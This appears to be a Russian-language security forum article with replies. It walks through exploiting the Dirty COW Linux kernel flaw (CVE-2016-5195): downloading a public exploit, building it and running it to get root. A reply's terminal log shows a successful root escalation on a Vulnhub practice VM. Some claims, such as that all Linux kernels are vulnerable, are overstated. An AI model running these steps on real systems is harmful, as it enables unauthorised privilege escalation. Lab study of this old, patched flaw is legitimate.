• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Статья Dirty Cow Exploit

Привет! В этой статье я хочу показать новый вид уязвимости, которой, подвержены, как пишут специалисты по информационной безопасности, все, без исключения ядра Linux на сегодняшний день. С её помощью локальный пользователь может повысить свои привилегии до root, из-за ошибки состязания в реализации механизма копирования при записи (COW) для страниц памяти, помеченных флагом dirty, при условии, что мы состоим в группе sudo/wheel (FreeBSD). По официальным данным, опубликованным 20.10.2016 года, уязвимость CVE-2016-5195, получившая имя Dirty COW, существовала в ядре Linux, начиная с версии 2.6.22 с 2007 года. Исследователь Фил Остер обнаруживший проблему, уже уведомил RedHat о том, что недавно эксплоит для данной уязвимости был использован в ходе реальных атак. Такие вот дела в мире Linux:) Попробуем проэкплойтить нашу систему.

upload_2016-11-11_21-43-44.png


Переходим по адресу: https://github.com/gbonacini/CVE-2016-5195

upload_2016-11-11_21-44-1.png


И скачиваем архив:

upload_2016-11-11_21-44-21.png


Затем распакуем его в папку локального пользователя, в моем случае /home/necro

upload_2016-11-11_21-44-43.png


Залогинившись под пользователем necro, перейдем в его домашний каталог:

> su necro

> cd ~

Затем перейдем в папку, куда мы распаковывали архив.

> cd CVE-2016-5195-master

> sudo –s make

Все должно пройти без ошибок.

> sudo –s ./dcow

upload_2016-11-11_21-45-32.png


Вводим свой пароль, и пытаемся получить root-доступ, используя тот пароль, который нам подсказывает Dirty Cow:

> su

Вводим его и становимся root!

upload_2016-11-11_21-46-0.png


P.S. На скачанной вчера Debian, эксплоит уже не работает:) Так, что наверное не все так плохо.
Пруф -
 

Konstantin

One Level
12.11.2016
8
2
BIT
0
Почему через минуту, после получения прав root, комп наглухо виснит?
 
  • Нравится
Реакции: Vander

arbaiten

Green Team
03.12.2017
13
9
BIT
0
Bash:
webmin@VulnOSv2:~/CVE-2016-5195-master$ ls
changelog  CONTRIBUTING.md  dcow.cpp  golang  legacy  makefile  README.md  version
webmin@VulnOSv2:~/CVE-2016-5195-master$ sudo -s make
[sudo] password for webmin:
webmin is not in the sudoers file.  This incident will be reported.
webmin@VulnOSv2:~/CVE-2016-5195-master$ make
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
webmin@VulnOSv2:~/CVE-2016-5195-master$ ls -l
total 80
-rw-rw-r-- 1 webmin webmin  1591 Mar 21  2017 changelog
-rw-rw-r-- 1 webmin webmin   947 Mar 21  2017 CONTRIBUTING.md
-rwxrwxr-x 1 webmin webmin 40159 Jun  1 14:44 dcow
-rw-rw-r-- 1 webmin webmin 10092 Mar 21  2017 dcow.cpp
drwxrwxr-x 3 webmin webmin  4096 Mar 21  2017 golang
drwxrwxr-x 2 webmin webmin  4096 Mar 21  2017 legacy
-rw-rw-r-- 1 webmin webmin   143 Mar 21  2017 makefile
-rw-rw-r-- 1 webmin webmin  2807 Mar 21  2017 README.md
-rw-rw-r-- 1 webmin webmin     7 Mar 21  2017 version
webmin@VulnOSv2:~/CVE-2016-5195-master$ ./dcow
Running ...
Received su prompt (Password: )
Root password is:   dirtyCowFun
Enjoy! :-)
webmin@VulnOSv2:~/CVE-2016-5195-master$ su root
Password:
root@VulnOSv2:/home/webmin/CVE-2016-5195-master# id
uid=0(root) gid=0(root) groups=0(root)

На VM с Vulnhub отработала

Bash:
root@VulnOSv2:/home/webmin/CVE-2016-5195-master# uname -a
Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 i686 GNU/Linux
root@VulnOSv2:/home/webmin/CVE-2016-5195-master# lsb_release -a
No LSB modules are available.
Distributor ID:    Ubuntu
Description:    Ubuntu 14.04.4 LTS
Release:    14.04
Codename:    trusty
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!